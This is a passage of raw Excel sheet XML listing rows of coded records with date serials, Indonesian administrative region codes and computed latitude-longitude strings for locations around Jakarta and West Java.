      <c r="C1302">
        <v>1</v>
      </c>
      <c r="D1302" t="s">
        <v>22</v>
      </c>
      <c r="E1302" t="s">
        <v>23</v>
      </c>
      <c r="F1302" t="s">
        <v>4732</v>
      </c>
      <c r="G1302" t="s">
        <v>4733</v>
      </c>
      <c r="H1302" t="s">
        <v>26</v>
      </c>
      <c r="I1302" t="s">
        <v>117</v>
      </c>
      <c r="J1302" t="s">
        <v>2268</v>
      </c>
      <c r="L1302" t="s">
        <v>4734</v>
      </c>
      <c r="M1302">
        <v>3175030002</v>
      </c>
      <c r="N1302">
        <v>3175030</v>
      </c>
      <c r="O1302">
        <v>3175</v>
      </c>
      <c r="P1302">
        <v>31</v>
      </c>
      <c r="Q1302" t="s">
        <v>1592</v>
      </c>
      <c r="R1302" t="s">
        <v>1563</v>
      </c>
      <c r="S1302" t="s">
        <v>547</v>
      </c>
      <c r="T1302" t="s">
        <v>33</v>
      </c>
      <c r="U1302" s="5">
        <v>10686208</v>
      </c>
      <c r="V1302" s="5" t="s">
        <v>14780</v>
      </c>
      <c r="W1302" s="5">
        <v>-615469</v>
      </c>
      <c r="X1302" t="s">
        <v>19437</v>
      </c>
      <c r="Y1302" t="str">
        <f t="shared" si="20"/>
        <v>-6.15469,106.86208</v>
      </c>
    </row>
    <row r="1303" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1303">
        <v>108875</v>
      </c>
      <c r="B1303" s="1">
        <v>43885</v>
      </c>
      <c r="C1303">
        <v>1</v>
      </c>
      <c r="D1303" t="s">
        <v>22</v>
      </c>
      <c r="E1303" t="s">
        <v>23</v>
      </c>
      <c r="F1303" t="s">
        <v>4735</v>
      </c>
      <c r="G1303" t="s">
        <v>4736</v>
      </c>
      <c r="H1303" t="s">
        <v>26</v>
      </c>
      <c r="I1303" t="s">
        <v>843</v>
      </c>
      <c r="J1303" t="s">
        <v>2627</v>
      </c>
      <c r="L1303" t="s">
        <v>4737</v>
      </c>
      <c r="M1303">
        <v>3275020003</v>
      </c>
      <c r="N1303">
        <v>3275020</v>
      </c>
      <c r="O1303">
        <v>3275</v>
      </c>
      <c r="P1303">
        <v>32</v>
      </c>
      <c r="Q1303" t="s">
        <v>4738</v>
      </c>
      <c r="R1303" t="s">
        <v>828</v>
      </c>
      <c r="S1303" t="s">
        <v>41</v>
      </c>
      <c r="T1303" t="s">
        <v>42</v>
      </c>
      <c r="U1303" s="5">
        <v>10697178</v>
      </c>
      <c r="V1303" s="5" t="s">
        <v>15661</v>
      </c>
      <c r="W1303" s="5">
        <v>-628902</v>
      </c>
      <c r="X1303" t="s">
        <v>19438</v>
      </c>
      <c r="Y1303" t="str">
        <f t="shared" si="20"/>
        <v>-6.28902,106.97178</v>
      </c>
    </row>
    <row r="1304" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1304">
        <v>108876</v>
      </c>
      <c r="B1304" s="1">
        <v>43885</v>
      </c>
      <c r="C1304">
        <v>1</v>
      </c>
      <c r="D1304" t="s">
        <v>22</v>
      </c>
      <c r="E1304" t="s">
        <v>23</v>
      </c>
      <c r="F1304" t="s">
        <v>4739</v>
      </c>
      <c r="G1304" t="s">
        <v>4740</v>
      </c>
      <c r="H1304" t="s">
        <v>26</v>
      </c>
      <c r="I1304" t="s">
        <v>27</v>
      </c>
      <c r="J1304" t="s">
        <v>2627</v>
      </c>
      <c r="L1304" t="s">
        <v>4741</v>
      </c>
      <c r="M1304">
        <v>3216082001</v>
      </c>
      <c r="N1304">
        <v>3216082</v>
      </c>
      <c r="O1304">
        <v>3216</v>
      </c>
      <c r="P1304">
        <v>32</v>
      </c>
      <c r="Q1304" t="s">
        <v>600</v>
      </c>
      <c r="R1304" t="s">
        <v>601</v>
      </c>
      <c r="S1304" t="s">
        <v>41</v>
      </c>
      <c r="T1304" t="s">
        <v>42</v>
      </c>
      <c r="U1304" s="5">
        <v>10703960</v>
      </c>
      <c r="V1304" s="5" t="s">
        <v>15662</v>
      </c>
      <c r="W1304" s="5">
        <v>-622699</v>
      </c>
      <c r="X1304" t="s">
        <v>19439</v>
      </c>
      <c r="Y1304" t="str">
        <f t="shared" si="20"/>
        <v>-6.22699,107.03960</v>
      </c>
    </row>
    <row r="1305" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1305">
        <v>108877</v>
      </c>
      <c r="B1305" s="1">
        <v>43885</v>
      </c>
      <c r="C1305">
        <v>1</v>
      </c>
      <c r="D1305" t="s">
        <v>22</v>
      </c>
      <c r="E1305" t="s">
        <v>23</v>
      </c>
      <c r="F1305" t="s">
        <v>4742</v>
      </c>
      <c r="H1305" t="s">
        <v>26</v>
      </c>
      <c r="I1305" t="s">
        <v>27</v>
      </c>
      <c r="J1305" t="s">
        <v>4743</v>
      </c>
      <c r="L1305" t="s">
        <v>4744</v>
      </c>
      <c r="M1305">
        <v>3173080004</v>
      </c>
      <c r="N1305">
        <v>3173080</v>
      </c>
      <c r="O1305">
        <v>3173</v>
      </c>
      <c r="P1305">
        <v>31</v>
      </c>
      <c r="Q1305" t="s">
        <v>4745</v>
      </c>
      <c r="R1305" t="s">
        <v>157</v>
      </c>
      <c r="S1305" t="s">
        <v>62</v>
      </c>
      <c r="T1305" t="s">
        <v>33</v>
      </c>
      <c r="U1305" s="5">
        <v>10682537</v>
      </c>
      <c r="V1305" s="5" t="s">
        <v>15663</v>
      </c>
      <c r="W1305" s="5">
        <v>-616315</v>
      </c>
      <c r="X1305" t="s">
        <v>19440</v>
      </c>
      <c r="Y1305" t="str">
        <f t="shared" si="20"/>
        <v>-6.16315,106.82537</v>
      </c>
    </row>
    <row r="1306" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1306">
        <v>108878</v>
      </c>
      <c r="B1306" s="1">
        <v>43885</v>
      </c>
      <c r="C1306">
        <v>1</v>
      </c>
      <c r="D1306" t="s">
        <v>22</v>
      </c>
      <c r="E1306" t="s">
        <v>23</v>
      </c>
      <c r="F1306" t="s">
        <v>4746</v>
      </c>
      <c r="G1306" t="s">
        <v>4747</v>
      </c>
      <c r="H1306" t="s">
        <v>26</v>
      </c>
      <c r="I1306" t="s">
        <v>1394</v>
      </c>
      <c r="J1306" t="s">
        <v>3581</v>
      </c>
      <c r="L1306" t="s">
        <v>4748</v>
      </c>
      <c r="M1306">
        <v>3173040001</v>
      </c>
      <c r="N1306">
        <v>3173040</v>
      </c>
      <c r="O1306">
        <v>3173</v>
      </c>
      <c r="P1306">
        <v>31</v>
      </c>
      <c r="Q1306" t="s">
        <v>1598</v>
      </c>
      <c r="R1306" t="s">
        <v>1598</v>
      </c>
      <c r="S1306" t="s">
        <v>62</v>
      </c>
      <c r="T1306" t="s">
        <v>33</v>
      </c>
      <c r="U1306" s="5">
        <v>10685677</v>
      </c>
      <c r="V1306" s="5" t="s">
        <v>15664</v>
      </c>
      <c r="W1306" s="5">
        <v>-618734</v>
      </c>
      <c r="X1306" t="s">
        <v>19441</v>
      </c>
      <c r="Y1306" t="str">
        <f t="shared" si="20"/>
        <v>-6.18734,106.85677</v>
      </c>
    </row>
    <row r="1307" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1307">
        <v>108879</v>
      </c>
      <c r="B1307" s="1">
        <v>43885</v>
      </c>
      <c r="C1307">
        <v>1</v>
      </c>
      <c r="D1307" t="s">
        <v>85</v>
      </c>
      <c r="E1307" t="s">
        <v>23</v>
      </c>
      <c r="F1307" t="s">
        <v>4749</v>
      </c>
      <c r="G1307" t="s">
        <v>4750</v>
      </c>
      <c r="H1307" t="s">
        <v>26</v>
      </c>
      <c r="J1307" t="s">
        <v>3135</v>
      </c>
      <c r="K1307" t="s">
        <v>4751</v>
      </c>
      <c r="L1307" t="s">
        <v>4752</v>
      </c>
      <c r="M1307">
        <v>3671011008</v>
      </c>
      <c r="N1307">
        <v>3671011</v>
      </c>
      <c r="O1307">
        <v>3671</v>
      </c>
      <c r="P1307">
        <v>36</v>
      </c>
      <c r="Q1307" t="s">
        <v>700</v>
      </c>
      <c r="R1307" t="s">
        <v>701</v>
      </c>
      <c r="S1307" t="s">
        <v>201</v>
      </c>
      <c r="T1307" t="s">
        <v>171</v>
      </c>
      <c r="U1307" s="5">
        <v>10672970</v>
      </c>
      <c r="V1307" s="5" t="s">
        <v>15665</v>
      </c>
      <c r="W1307" s="5">
        <v>-623385</v>
      </c>
      <c r="X1307" t="s">
        <v>19442</v>
      </c>
      <c r="Y1307" t="str">
        <f t="shared" si="20"/>
        <v>-6.23385,106.72970</v>
      </c>
    </row>
    <row r="1308" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1308">
        <v>108880</v>
      </c>
      <c r="B1308" s="1">
        <v>43885</v>
      </c>
      <c r="C1308">
        <v>1</v>
      </c>
      <c r="D1308" t="s">
        <v>22</v>
      </c>
      <c r="E1308" t="s">
        <v>23</v>
      </c>
      <c r="F1308" t="s">
        <v>4753</v>
      </c>
      <c r="G1308" t="s">
        <v>4754</v>
      </c>
      <c r="H1308" t="s">
        <v>26</v>
      </c>
      <c r="I1308" t="s">
        <v>3275</v>
      </c>
      <c r="J1308" t="s">
        <v>4755</v>
      </c>
      <c r="M1308">
        <v>3175020003</v>
      </c>
      <c r="N1308">
        <v>3175020</v>
      </c>
      <c r="O1308">
        <v>3175</v>
      </c>
      <c r="P1308">
        <v>31</v>
      </c>
      <c r="Q1308" t="s">
        <v>2667</v>
      </c>
      <c r="R1308" t="s">
        <v>2228</v>
      </c>
      <c r="S1308" t="s">
        <v>547</v>
      </c>
      <c r="T1308" t="s">
        <v>33</v>
      </c>
      <c r="U1308" s="5">
        <v>10681101</v>
      </c>
      <c r="V1308" s="5" t="s">
        <v>15666</v>
      </c>
      <c r="W1308" s="5">
        <v>-612539</v>
      </c>
      <c r="X1308" t="s">
        <v>19443</v>
      </c>
      <c r="Y1308" t="str">
        <f t="shared" si="20"/>
        <v>-6.12539,106.81101</v>
      </c>
    </row>
    <row r="1309" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1309">
        <v>108881</v>
      </c>
      <c r="B1309" s="1">
        <v>43885</v>
      </c>
      <c r="C1309">
        <v>1</v>
      </c>
      <c r="D1309" t="s">
        <v>22</v>
      </c>
      <c r="E1309" t="s">
        <v>23</v>
      </c>
      <c r="F1309" t="s">
        <v>4756</v>
      </c>
      <c r="G1309" t="s">
        <v>4757</v>
      </c>
      <c r="H1309" t="s">
        <v>26</v>
      </c>
      <c r="I1309" t="s">
        <v>3024</v>
      </c>
      <c r="J1309" t="s">
        <v>4758</v>
      </c>
      <c r="L1309" t="s">
        <v>4759</v>
      </c>
      <c r="M1309">
        <v>3175020002</v>
      </c>
      <c r="N1309">
        <v>3175020</v>
      </c>
      <c r="O1309">
        <v>3175</v>
      </c>
      <c r="P1309">
        <v>31</v>
      </c>
      <c r="Q1309" t="s">
        <v>4760</v>
      </c>
      <c r="R1309" t="s">
        <v>2228</v>
      </c>
      <c r="S1309" t="s">
        <v>547</v>
      </c>
      <c r="T1309" t="s">
        <v>33</v>
      </c>
      <c r="U1309" s="5">
        <v>10685117</v>
      </c>
      <c r="V1309" s="5" t="s">
        <v>15667</v>
      </c>
      <c r="W1309" s="5">
        <v>-614145</v>
      </c>
      <c r="X1309" t="s">
        <v>19444</v>
      </c>
      <c r="Y1309" t="str">
        <f t="shared" si="20"/>
        <v>-6.14145,106.85117</v>
      </c>
    </row>
    <row r="1310" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1310">
        <v>108882</v>
      </c>
      <c r="B1310" s="1">
        <v>43885</v>
      </c>
      <c r="C1310">
        <v>1</v>
      </c>
      <c r="D1310" t="s">
        <v>22</v>
      </c>
      <c r="E1310" t="s">
        <v>23</v>
      </c>
      <c r="F1310" t="s">
        <v>4761</v>
      </c>
      <c r="G1310" t="s">
        <v>4762</v>
      </c>
      <c r="H1310" t="s">
        <v>26</v>
      </c>
      <c r="I1310" t="s">
        <v>511</v>
      </c>
      <c r="J1310" t="s">
        <v>3135</v>
      </c>
      <c r="M1310">
        <v>3674060003</v>
      </c>
      <c r="N1310">
        <v>3674060</v>
      </c>
      <c r="O1310">
        <v>3674</v>
      </c>
      <c r="P1310">
        <v>36</v>
      </c>
      <c r="Q1310" t="s">
        <v>205</v>
      </c>
      <c r="R1310" t="s">
        <v>169</v>
      </c>
      <c r="S1310" t="s">
        <v>170</v>
      </c>
      <c r="T1310" t="s">
        <v>171</v>
      </c>
      <c r="U1310" s="5">
        <v>10669245</v>
      </c>
      <c r="V1310" s="5" t="s">
        <v>15668</v>
      </c>
      <c r="W1310" s="5">
        <v>-624951</v>
      </c>
      <c r="X1310" t="s">
        <v>19445</v>
      </c>
      <c r="Y1310" t="str">
        <f t="shared" si="20"/>
        <v>-6.24951,106.69245</v>
      </c>
    </row>
    <row r="1311" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1311">
        <v>108883</v>
      </c>
      <c r="B1311" s="1">
        <v>43885</v>
      </c>
      <c r="C1311">
        <v>1</v>
      </c>
      <c r="D1311" t="s">
        <v>22</v>
      </c>
      <c r="E1311" t="s">
        <v>23</v>
      </c>
      <c r="F1311" t="s">
        <v>4763</v>
      </c>
      <c r="G1311" t="s">
        <v>4764</v>
      </c>
      <c r="H1311" t="s">
        <v>26</v>
      </c>
      <c r="I1311" t="s">
        <v>367</v>
      </c>
      <c r="J1311" t="s">
        <v>2627</v>
      </c>
      <c r="L1311" t="s">
        <v>4765</v>
      </c>
      <c r="M1311">
        <v>3275040005</v>
      </c>
      <c r="N1311">
        <v>3275040</v>
      </c>
      <c r="O1311">
        <v>3275</v>
      </c>
      <c r="P1311">
        <v>32</v>
      </c>
      <c r="Q1311" t="s">
        <v>2956</v>
      </c>
      <c r="R1311" t="s">
        <v>100</v>
      </c>
      <c r="S1311" t="s">
        <v>41</v>
      </c>
      <c r="T1311" t="s">
        <v>42</v>
      </c>
      <c r="U1311" s="5">
        <v>10701986</v>
      </c>
      <c r="V1311" s="5" t="s">
        <v>15669</v>
      </c>
      <c r="W1311" s="5">
        <v>-625313</v>
      </c>
      <c r="X1311" t="s">
        <v>19446</v>
      </c>
      <c r="Y1311" t="str">
        <f t="shared" si="20"/>
        <v>-6.25313,107.01986</v>
      </c>
    </row>
    <row r="1312" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1312">
        <v>108884</v>
      </c>
      <c r="B1312" s="1">
        <v>43885</v>
      </c>
      <c r="C1312">
        <v>1</v>
      </c>
      <c r="D1312" t="s">
        <v>22</v>
      </c>
      <c r="E1312" t="s">
        <v>23</v>
      </c>
      <c r="F1312" t="s">
        <v>4766</v>
      </c>
      <c r="G1312" t="s">
        <v>4767</v>
      </c>
      <c r="H1312" t="s">
        <v>26</v>
      </c>
      <c r="I1312" t="s">
        <v>457</v>
      </c>
      <c r="J1312" t="s">
        <v>2627</v>
      </c>
      <c r="L1312" t="s">
        <v>4768</v>
      </c>
      <c r="M1312">
        <v>3275010010</v>
      </c>
      <c r="N1312">
        <v>3275010</v>
      </c>
      <c r="O1312">
        <v>3275</v>
      </c>
      <c r="P1312">
        <v>32</v>
      </c>
      <c r="Q1312" t="s">
        <v>286</v>
      </c>
      <c r="R1312" t="s">
        <v>287</v>
      </c>
      <c r="S1312" t="s">
        <v>41</v>
      </c>
      <c r="T1312" t="s">
        <v>42</v>
      </c>
      <c r="U1312" s="5">
        <v>10695014</v>
      </c>
      <c r="V1312" s="5" t="s">
        <v>15670</v>
      </c>
      <c r="W1312" s="5">
        <v>-625834</v>
      </c>
      <c r="X1312" t="s">
        <v>19447</v>
      </c>
      <c r="Y1312" t="str">
        <f t="shared" si="20"/>
        <v>-6.25834,106.95014</v>
      </c>
    </row>
    <row r="1313" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1313">
        <v>108885</v>
      </c>
      <c r="B1313" s="1">
        <v>43885</v>
      </c>
      <c r="C1313">
        <v>1</v>
      </c>
      <c r="D1313" t="s">
        <v>22</v>
      </c>
      <c r="E1313" t="s">
        <v>23</v>
      </c>
      <c r="F1313" t="s">
        <v>4769</v>
      </c>
      <c r="H1313" t="s">
        <v>26</v>
      </c>
      <c r="I1313" t="s">
        <v>166</v>
      </c>
      <c r="J1313" t="s">
        <v>4770</v>
      </c>
      <c r="L1313" t="s">
        <v>4771</v>
      </c>
      <c r="M1313">
        <v>3171040003</v>
      </c>
      <c r="N1313">
        <v>3171040</v>
      </c>
      <c r="O1313">
        <v>3171</v>
      </c>
      <c r="P1313">
        <v>31</v>
      </c>
      <c r="Q1313" t="s">
        <v>411</v>
      </c>
      <c r="R1313" t="s">
        <v>163</v>
      </c>
      <c r="S1313" t="s">
        <v>108</v>
      </c>
      <c r="T1313" t="s">
        <v>33</v>
      </c>
      <c r="U1313" s="5">
        <v>10676076</v>
      </c>
      <c r="V1313" s="5" t="s">
        <v>15671</v>
      </c>
      <c r="W1313" s="5">
        <v>-623630</v>
      </c>
      <c r="X1313" t="s">
        <v>19448</v>
      </c>
      <c r="Y1313" t="str">
        <f t="shared" si="20"/>
        <v>-6.23630,106.76076</v>
      </c>
    </row>
    <row r="1314" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1314">
        <v>108886</v>
      </c>
      <c r="B1314" s="1">
        <v>43885</v>
      </c>
      <c r="C1314">
        <v>1</v>
      </c>
      <c r="D1314" t="s">
        <v>22</v>
      </c>
      <c r="E1314" t="s">
        <v>23</v>
      </c>
      <c r="F1314" t="s">
        <v>4772</v>
      </c>
      <c r="G1314" t="s">
        <v>4773</v>
      </c>
      <c r="H1314" t="s">
        <v>26</v>
      </c>
      <c r="I1314" t="s">
        <v>72</v>
      </c>
      <c r="J1314" t="s">
        <v>2627</v>
      </c>
      <c r="M1314">
        <v>3275060008</v>
      </c>
      <c r="N1314">
        <v>3275060</v>
      </c>
      <c r="O1314">
        <v>3275</v>
      </c>
      <c r="P1314">
        <v>32</v>
      </c>
      <c r="Q1314" t="s">
        <v>2473</v>
      </c>
      <c r="R1314" t="s">
        <v>114</v>
      </c>
      <c r="S1314" t="s">
        <v>41</v>
      </c>
      <c r="T1314" t="s">
        <v>42</v>
      </c>
      <c r="U1314" s="5">
        <v>10696797</v>
      </c>
      <c r="V1314" s="5" t="s">
        <v>15672</v>
      </c>
      <c r="W1314" s="5">
        <v>-624720</v>
      </c>
      <c r="X1314" t="s">
        <v>19449</v>
      </c>
      <c r="Y1314" t="str">
        <f t="shared" si="20"/>
        <v>-6.24720,106.96797</v>
      </c>
    </row>
    <row r="1315" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1315">
        <v>108887</v>
      </c>
      <c r="B1315" s="1">
        <v>43885</v>
      </c>
      <c r="C1315">
        <v>1</v>
      </c>
      <c r="D1315" t="s">
        <v>22</v>
      </c>
      <c r="E1315" t="s">
        <v>23</v>
      </c>
      <c r="F1315" s="3" t="s">
        <v>4774</v>
      </c>
      <c r="G1315" t="s">
        <v>4775</v>
      </c>
      <c r="H1315" t="s">
        <v>26</v>
      </c>
      <c r="I1315" t="s">
        <v>3024</v>
      </c>
      <c r="J1315" t="s">
        <v>2627</v>
      </c>
      <c r="M1315">
        <v>3273180006</v>
      </c>
      <c r="N1315">
        <v>3273180</v>
      </c>
      <c r="O1315">
        <v>3273</v>
      </c>
      <c r="P1315">
        <v>32</v>
      </c>
      <c r="Q1315" t="s">
        <v>31</v>
      </c>
      <c r="R1315" t="s">
        <v>1731</v>
      </c>
      <c r="S1315" t="s">
        <v>1464</v>
      </c>
      <c r="T1315" t="s">
        <v>42</v>
      </c>
      <c r="U1315" s="5">
        <v>10760302</v>
      </c>
      <c r="V1315" s="5" t="s">
        <v>15673</v>
      </c>
      <c r="W1315" s="5">
        <v>-691984</v>
      </c>
      <c r="X1315" t="s">
        <v>19450</v>
      </c>
      <c r="Y1315" t="str">
        <f t="shared" si="20"/>
        <v>-6.91984,107.60302</v>
      </c>
    </row>
    <row r="1316" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1316">
        <v>108888</v>
      </c>
      <c r="B1316" s="1">
        <v>43885</v>
      </c>
      <c r="C1316">
        <v>1</v>
      </c>
      <c r="D1316" t="s">
        <v>22</v>
      </c>
      <c r="E1316" t="s">
        <v>23</v>
      </c>
      <c r="F1316" t="s">
        <v>4776</v>
      </c>
      <c r="G1316" t="s">
        <v>4777</v>
      </c>
      <c r="H1316" t="s">
        <v>26</v>
      </c>
      <c r="I1316" t="s">
        <v>44</v>
      </c>
      <c r="J1316" t="s">
        <v>4778</v>
      </c>
      <c r="L1316" t="s">
        <v>4779</v>
      </c>
      <c r="M1316">
        <v>3174020004</v>
      </c>
      <c r="N1316">
        <v>3174020</v>
      </c>
      <c r="O1316">
        <v>3174</v>
      </c>
      <c r="P1316">
        <v>31</v>
      </c>
      <c r="Q1316" t="s">
        <v>31</v>
      </c>
      <c r="R1316" t="s">
        <v>31</v>
      </c>
      <c r="S1316" t="s">
        <v>32</v>
      </c>
      <c r="T1316" t="s">
        <v>33</v>
      </c>
      <c r="U1316" s="5">
        <v>10676337</v>
      </c>
      <c r="V1316" s="5" t="s">
        <v>15674</v>
      </c>
      <c r="W1316" s="5">
        <v>-619851</v>
      </c>
      <c r="X1316" t="s">
        <v>19451</v>
      </c>
      <c r="Y1316" t="str">
        <f t="shared" si="20"/>
        <v>-6.19851,106.76337</v>
      </c>
    </row>
    <row r="1317" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1317">
        <v>108889</v>
      </c>
      <c r="B1317" s="1">
        <v>43885</v>
      </c>
      <c r="C1317">
        <v>1</v>
      </c>
      <c r="D1317" t="s">
        <v>22</v>
      </c>
      <c r="E1317" t="s">
        <v>23</v>
      </c>
      <c r="F1317" t="s">
        <v>4780</v>
      </c>
      <c r="G1317" t="s">
        <v>4781</v>
      </c>
      <c r="H1317" t="s">
        <v>26</v>
      </c>
      <c r="I1317" t="s">
        <v>788</v>
      </c>
      <c r="J1317" t="s">
        <v>4782</v>
      </c>
      <c r="L1317" t="s">
        <v>4783</v>
      </c>
      <c r="M1317">
        <v>3172080001</v>
      </c>
      <c r="N1317">
        <v>3172080</v>
      </c>
      <c r="O1317">
        <v>3172</v>
      </c>
      <c r="P1317">
        <v>31</v>
      </c>
      <c r="Q1317" t="s">
        <v>48</v>
      </c>
      <c r="R1317" t="s">
        <v>141</v>
      </c>
      <c r="S1317" t="s">
        <v>49</v>
      </c>
      <c r="T1317" t="s">
        <v>33</v>
      </c>
      <c r="U1317" s="5">
        <v>10690836</v>
      </c>
      <c r="V1317" s="5" t="s">
        <v>15675</v>
      </c>
      <c r="W1317" s="5">
        <v>-620350</v>
      </c>
      <c r="X1317" t="s">
        <v>19452</v>
      </c>
      <c r="Y1317" t="str">
        <f t="shared" si="20"/>
        <v>-6.20350,106.90836</v>
      </c>
    </row>
    <row r="1318" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1318">
        <v>108890</v>
      </c>
      <c r="B1318" s="1">
        <v>43885</v>
      </c>
      <c r="C1318">
        <v>1</v>
      </c>
      <c r="D1318" t="s">
        <v>22</v>
      </c>
      <c r="E1318" t="s">
        <v>23</v>
      </c>
      <c r="F1318" t="s">
        <v>4784</v>
      </c>
      <c r="H1318" t="s">
        <v>26</v>
      </c>
      <c r="I1318" t="s">
        <v>166</v>
      </c>
      <c r="J1318" t="s">
        <v>4770</v>
      </c>
      <c r="L1318" t="s">
        <v>4785</v>
      </c>
      <c r="M1318">
        <v>3171040003</v>
      </c>
      <c r="N1318">
        <v>3171040</v>
      </c>
      <c r="O1318">
        <v>3171</v>
      </c>
      <c r="P1318">
        <v>31</v>
      </c>
      <c r="Q1318" t="s">
        <v>411</v>
      </c>
      <c r="R1318" t="s">
        <v>163</v>
      </c>
      <c r="S1318" t="s">
        <v>108</v>
      </c>
      <c r="T1318" t="s">
        <v>33</v>
      </c>
      <c r="U1318" s="5">
        <v>10676077</v>
      </c>
      <c r="V1318" s="5" t="s">
        <v>15676</v>
      </c>
      <c r="W1318" s="5">
        <v>-623625</v>
      </c>
      <c r="X1318" t="s">
        <v>19453</v>
      </c>
      <c r="Y1318" t="str">
        <f t="shared" si="20"/>
        <v>-6.23625,106.76077</v>
      </c>
    </row>
    <row r="1319" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1319">
        <v>108891</v>
      </c>
      <c r="B1319" s="1">
        <v>43885</v>
      </c>
      <c r="C1319">
        <v>1</v>
      </c>
      <c r="D1319" t="s">
        <v>22</v>
      </c>
      <c r="E1319" t="s">
        <v>23</v>
      </c>
      <c r="F1319" t="s">
        <v>4786</v>
      </c>
      <c r="H1319" t="s">
        <v>26</v>
      </c>
      <c r="I1319" t="s">
        <v>4787</v>
      </c>
      <c r="J1319" t="s">
        <v>4788</v>
      </c>
      <c r="L1319" t="s">
        <v>4789</v>
      </c>
      <c r="M1319">
        <v>3174040003</v>
      </c>
      <c r="N1319">
        <v>3174040</v>
      </c>
      <c r="O1319">
        <v>3174</v>
      </c>
      <c r="P1319">
        <v>31</v>
      </c>
      <c r="Q1319" t="s">
        <v>3011</v>
      </c>
      <c r="R1319" t="s">
        <v>377</v>
      </c>
      <c r="S1319" t="s">
        <v>32</v>
      </c>
      <c r="T1319" t="s">
        <v>33</v>
      </c>
      <c r="U1319" s="5">
        <v>10678853</v>
      </c>
      <c r="V1319" s="5" t="s">
        <v>15677</v>
      </c>
      <c r="W1319" s="5">
        <v>-616872</v>
      </c>
      <c r="X1319" t="s">
        <v>18749</v>
      </c>
      <c r="Y1319" t="str">
        <f t="shared" si="20"/>
        <v>-6.16872,106.78853</v>
      </c>
    </row>
    <row r="1320" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1320">
        <v>108892</v>
      </c>
      <c r="B1320" s="1">
        <v>43885</v>
      </c>
      <c r="C1320">
        <v>1</v>
      </c>
      <c r="D1320" t="s">
        <v>22</v>
      </c>
      <c r="E1320" t="s">
        <v>23</v>
      </c>
      <c r="F1320" t="s">
        <v>4790</v>
      </c>
      <c r="G1320" t="s">
        <v>4791</v>
      </c>
      <c r="H1320" t="s">
        <v>26</v>
      </c>
      <c r="I1320" t="s">
        <v>166</v>
      </c>
      <c r="J1320" t="s">
        <v>3769</v>
      </c>
      <c r="L1320" t="s">
        <v>4792</v>
      </c>
      <c r="M1320">
        <v>3172090001</v>
      </c>
      <c r="N1320">
        <v>3172090</v>
      </c>
      <c r="O1320">
        <v>3172</v>
      </c>
      <c r="P1320">
        <v>31</v>
      </c>
      <c r="Q1320" t="s">
        <v>2681</v>
      </c>
      <c r="R1320" t="s">
        <v>890</v>
      </c>
      <c r="S1320" t="s">
        <v>49</v>
      </c>
      <c r="T1320" t="s">
        <v>33</v>
      </c>
      <c r="U1320" s="5">
        <v>10687716</v>
      </c>
      <c r="V1320" s="5" t="s">
        <v>15678</v>
      </c>
      <c r="W1320" s="5">
        <v>-620476</v>
      </c>
      <c r="X1320" t="s">
        <v>19454</v>
      </c>
      <c r="Y1320" t="str">
        <f t="shared" si="20"/>
        <v>-6.20476,106.87716</v>
      </c>
    </row>
    <row r="1321" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1321">
        <v>108893</v>
      </c>
      <c r="B1321" s="1">
        <v>43885</v>
      </c>
      <c r="C1321">
        <v>1</v>
      </c>
      <c r="D1321" t="s">
        <v>22</v>
      </c>
      <c r="E1321" t="s">
        <v>23</v>
      </c>
      <c r="F1321" t="s">
        <v>4793</v>
      </c>
      <c r="G1321" t="s">
        <v>4794</v>
      </c>
      <c r="H1321" t="s">
        <v>26</v>
      </c>
      <c r="I1321" t="s">
        <v>166</v>
      </c>
      <c r="J1321" t="s">
        <v>2276</v>
      </c>
      <c r="L1321" t="s">
        <v>4795</v>
      </c>
      <c r="M1321">
        <v>3175060001</v>
      </c>
      <c r="N1321">
        <v>3175060</v>
      </c>
      <c r="O1321">
        <v>3175</v>
      </c>
      <c r="P1321">
        <v>31</v>
      </c>
      <c r="Q1321" t="s">
        <v>2278</v>
      </c>
      <c r="R1321" t="s">
        <v>2279</v>
      </c>
      <c r="S1321" t="s">
        <v>547</v>
      </c>
      <c r="T1321" t="s">
        <v>33</v>
      </c>
      <c r="U1321" s="5">
        <v>10692735</v>
      </c>
      <c r="V1321" s="5" t="s">
        <v>15679</v>
      </c>
      <c r="W1321" s="5">
        <v>-615964</v>
      </c>
      <c r="X1321" t="s">
        <v>19455</v>
      </c>
      <c r="Y1321" t="str">
        <f t="shared" si="20"/>
        <v>-6.15964,106.92735</v>
      </c>
    </row>
    <row r="1322" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1322">
        <v>108894</v>
      </c>
      <c r="B1322" s="1">
        <v>43885</v>
      </c>
      <c r="C1322">
        <v>1</v>
      </c>
      <c r="D1322" t="s">
        <v>22</v>
      </c>
      <c r="E1322" t="s">
        <v>23</v>
      </c>
      <c r="F1322" t="s">
        <v>4796</v>
      </c>
      <c r="G1322" t="s">
        <v>4797</v>
      </c>
      <c r="H1322" t="s">
        <v>26</v>
      </c>
      <c r="I1322" t="s">
        <v>197</v>
      </c>
      <c r="J1322" t="s">
        <v>2719</v>
      </c>
      <c r="L1322" t="s">
        <v>4798</v>
      </c>
      <c r="M1322">
        <v>3175050003</v>
      </c>
      <c r="N1322">
        <v>3175050</v>
      </c>
      <c r="O1322">
        <v>3175</v>
      </c>
      <c r="P1322">
        <v>31</v>
      </c>
      <c r="Q1322" t="s">
        <v>1740</v>
      </c>
      <c r="R1322" t="s">
        <v>1013</v>
      </c>
      <c r="S1322" t="s">
        <v>547</v>
      </c>
      <c r="T1322" t="s">
        <v>33</v>
      </c>
      <c r="U1322" s="5">
        <v>10690924</v>
      </c>
      <c r="V1322" s="5" t="s">
        <v>15680</v>
      </c>
      <c r="W1322" s="5">
        <v>-616674</v>
      </c>
